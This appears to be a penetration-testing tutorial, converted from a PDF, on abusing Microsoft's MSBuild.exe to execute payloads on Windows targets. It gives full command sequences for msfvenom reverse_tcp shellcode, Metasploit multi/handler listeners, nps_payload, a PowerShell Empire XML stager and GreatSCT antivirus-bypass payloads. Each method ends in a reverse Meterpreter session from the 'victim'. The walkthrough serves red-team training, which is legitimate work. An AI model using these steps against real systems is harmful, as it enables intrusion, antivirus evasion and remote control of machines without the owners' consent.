Contents

Introduction to MSbuild.exe ..............................................................3

Exploiting Techniques: .......................................................................3
Generate CSharp file with Msfvenom .............................................................. 3
Generate XML file to Exploit MSBuild .................................................6
Nps_Payload Script ............................................................................7
PowerShell Empire .............................................................................9
GreatSCT .......................................................................................... 12

Page 2 of 17
Introduction to MSbuild.exe
The Microsoft Build Engine is a platform for building applications. This engine, which is also known
as MSBuild, provides an XML schema for a project file that controls how the build platform processes
and builds software. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By
invoking msbuild.exe on your project or solution file, you can organise and build products in
environments where Visual Studio isn’t installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio
(.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:
Generate CSharp file with Msfvenom
We use Microsoft Visual Studio to create C # (C Sharp) programming project with a *.csproj suffix that
saved in MSBuild format so that it can be compiled with the MSBuild platform into an executable program.

With the help of a malicious build, we can obtain a reverse shell of the victim’s machine. Therefore, now
we will generate our file.csproj file and for that, first generate a shellcode of c# via msfvenom. Then later
that shellcode will be placed inside our file.csproj as given below.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f csharp

Page 3 of 17
The shellcode generated above should be placed in the XML file and you can download this XML file
from GitHub, which has the code that the MSBuild compiles and executes. This XML file should be saved
as. file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value from your C# shellcode and then rename buf as shellcode as shown
in the below image.

cat file.csproj

Page 4 of 17
You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can
compile an application to run on any one of several versions of the .NET Framework.

For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and
you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability
to compile to more than one framework is called multitargeting.
To know more about MSBuild read from here:
//docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch multi handler to get a meterpreter session and run the file.csproj file with msbuild.exe at the
target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

Note: you need to save your malicious payload (XML / csproj) at this location:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file with a command prompt.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
sysinfo

As you can observe, we have the meterpreter session of the victim as shown below:

Page 5 of 17
Generate XML file to Exploit MSBuild
As mentioned above, MSBuild uses an XML- based project file format that is straightforward and
extensible, so we can rename the generated file.csproj as file.xml and again run the file.xml with
msbuild.exe on the target path: C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe file.xml

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
sysinfo

Page 6 of 17
As you can observe, we have the meterpreter session of the victim as shown below:

Nps_Payload Script
This script will generate payloads for basic intrusion detection and avoidance. It utilises publicly
demonstrated techniques from several different sources. Larry Spohn (@Spoonman1091) wrote this.Ben
Mauch (@Ben0xA) aka dirty_ben created the payload.You can download it from GitHub.

Nps_payload generates payloads that could be executed with msbuild.exe and mshta.exe to get the
reverse connection of the victim’s machine via the meterpreter session.

Follow the below step for generating payload:

1. Run ./nps_payload.py script, once you have downloaded nps payload from GitHub
2. Press key 1 to select task "generate msbuild/nps/msf"
3. Again Press key 1 to select payload "windows/meterpreter/reverse_tcp"

This will generate a payload in the XML file, send this file at target location
C:\Windows\Microsoft.Net\Framework\v4.0.30319 as done in the previous method and simultaneously
run below command in a new terminal to start the listener.

msfconsole -r msbuild_nps.rc

Page 7 of 17
Now repeat the above step to execute msbuild_nps.xml with command prompt and obtain a reverse
connection via meterpreter as shown below:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml

Page 8 of 17
PowerShell Empire
For our next method of msbuild attack, we will use Empire. Empire is a post-exploitation framework. Till
now, we have paired our XML tacks with Metasploit, but in this method, we will use the Empire
framework. It’s solely a python-based PowerShell Windows agent, which makes it quite useful. Empire
was developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can
download this framework here.

To have a basic guide of Empire, please visit our article introducing empire:
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the empire framework is started, type listener to check if there are any active listeners. As you can
see in the image below that there are no active listeners. So to set up a listener type:

listeners
uselistener http
set Host //192.168.1.107
execute

Page 9 of 17
With the above commands, you will have an active listener.Type back to go out of listener so that you can
initiate your PowerShell.

For our MSBuild attack, we will use a stager. A stager, in the empire, is a snippet of code that allows our
malicious code to be run via the agent on the compromised host. So, for this type:

usestager windows/launcher_xml
set Listener http
execute

Usestager will create a malicious code file that will be saved in the /tmp named "launcher.xml."

Page 10 of 17
Once the file runs, we will have the result on our listener. Run the file in your victim's home by typing the
following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

To see if we have any open sessions, type "agents". Doing so will show you the name of the session you
have. To access that session type:

interact A8H14C7L

The above command will give you access to the session.

sysinfo

Page 11 of 17
GreatSCT
GreatSCT is a tool that allows you to use Metasploit exploits and lets it bypass most anti-viruses.
GreatSCT is current under support by @ConsciousHacker. You can download it from
here: //github.com/GreatSCT/GreatSCT

use Bypass

Once it’s downloaded and running, type the following command to access the modules:

Page 12 of 17
Now to see the list of payloads type:

list

Now from the list of payloads, you can choose anyone for your desired attack. But for this attack we will
use:

use msbuild/meterpreter/rev_tcp.py

Page 13 of 17
Once the command is executed, type:

set lhost 192.168.1.107

generate

Page 14 of 17
While generating the payload, it will ask you to give a name for the payload. By default, it will take the
name "payload" as the name. We have given msbuild as a payload name where the output code will be
saved in XML.

Page 15 of 17
Now, it has two files. One Metasploit RC file and other a msbuild.xml file.Now, firstly, start the python’s
server in /usr/share/greatsct-output/source by typing:

python -m SimpleHTTPServer 80

Run the file in your victim’s by typing following command:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe msbuild.xml

Page 16 of 17
Simultaneously, start the multi/handler using the resource file. For this, type:

msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

And voila! We have a meterpreter session as shown here.

Reference: //docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

Page 17 of 17
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in